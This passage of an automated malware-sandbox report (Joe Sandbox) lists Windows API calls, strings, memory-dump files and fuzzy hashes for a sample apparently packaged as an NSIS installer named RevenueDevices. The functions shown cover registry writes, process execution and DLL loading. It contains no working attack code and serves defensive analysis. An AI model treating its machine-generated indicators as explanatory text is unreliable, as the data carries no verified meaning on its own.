                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                        • BeginPaint.USER32(?,?), ref: 00401047
                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                        • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                        • DeleteObject.GDI32(?), ref: 004010F6
                                        • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                        • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                        • SelectObject.GDI32(00000000,?), ref: 00401149
                                        • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                        • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                        • DeleteObject.GDI32(?), ref: 0040116E
                                        • EndPaint.USER32(?,?), ref: 00401177
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                        • String ID: F
                                        • API String ID: 941294808-1304234792
                                        • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                        • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                        • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                        • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                        APIs
                                        • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                        • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                        • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                        • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                        • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                        • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                        • API String ID: 3581403547-784952888
                                        • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                        • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                        • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                        • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                        APIs
                                        • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                        • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                        • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                        • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                        Strings
                                        • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                        • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                        • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                        • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                        • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                        • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: lstrlen$CloseCreateValuewvsprintf
                                        • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                        • API String ID: 1641139501-220328614
                                        • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                        • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                        • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                        • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                        • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                        • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                        • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                        • DeleteFileW.KERNEL32(?), ref: 00402F56
                                        Strings
                                        • created uninstaller: %d, "%s", xrefs: 00402F3B
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                        • String ID: created uninstaller: %d, "%s"
                                        • API String ID: 3294113728-3145124454
                                        • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                        • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                        • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                        • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                        APIs
                                        • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                        • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                        • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                        • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                        • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                        • API String ID: 3734993849-2769509956
                                        • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                        • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                        • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                        • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                        • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                        Strings
                                        • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                        • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                        • `~, xrefs: 00402473
                                        • Error registering DLL: Could not load %s, xrefs: 004024DB
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                        • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`~
                                        • API String ID: 1033533793-2800238622
                                        • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                        • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                        • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                        • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                        • GetSysColor.USER32(00000000), ref: 00403E00
                                        • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                        • SetBkMode.GDI32(?,?), ref: 00403E18
                                        • GetSysColor.USER32(?), ref: 00403E2B
                                        • SetBkColor.GDI32(?,?), ref: 00403E3B
                                        • DeleteObject.GDI32(?), ref: 00403E55
                                        • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                        • String ID:
                                        • API String ID: 2320649405-0
                                        • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                        • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                        • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                        • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                        APIs
                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                          • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                          • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                        Strings
                                        • Exec: command="%s", xrefs: 00402241
                                        • Exec: success ("%s"), xrefs: 00402263
                                        • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                        • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                        • API String ID: 2014279497-3433828417
                                        • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                        • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                        • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                        • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                        APIs
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                        • GetMessagePos.USER32 ref: 00404871
                                        • ScreenToClient.USER32(?,?), ref: 00404889
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: Message$Send$ClientScreen
                                        • String ID: f
                                        • API String ID: 41195575-1993550816
                                        • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                        • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                        • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                        • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                        APIs
                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                        • MulDiv.KERNEL32(00014200,00000064,?), ref: 00403295
                                        • wsprintfW.USER32 ref: 004032A5
                                        • SetWindowTextW.USER32(?,?), ref: 004032B5
                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                        Strings
                                        • verifying installer: %d%%, xrefs: 0040329F
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: Text$ItemTimerWindowwsprintf
                                        • String ID: verifying installer: %d%%
                                        • API String ID: 1451636040-82062127
                                        • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                        • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                        • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                        • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                        APIs
                                        • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                        • wsprintfW.USER32 ref: 00404457
                                        • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: ItemTextlstrlenwsprintf
                                        • String ID: %u.%u%s%s$@rD
                                        • API String ID: 3540041739-1813061909
                                        • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                        • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                        • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                        • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                        APIs
                                        • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                        • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                        • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                        • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: Char$Next$Prev
                                        • String ID: *?|<>/":
                                        • API String ID: 589700163-165019052
                                        • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                        • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                        • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                        • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                        • RegCloseKey.ADVAPI32(?), ref: 00401504
                                        • RegCloseKey.ADVAPI32(?), ref: 00401529
                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
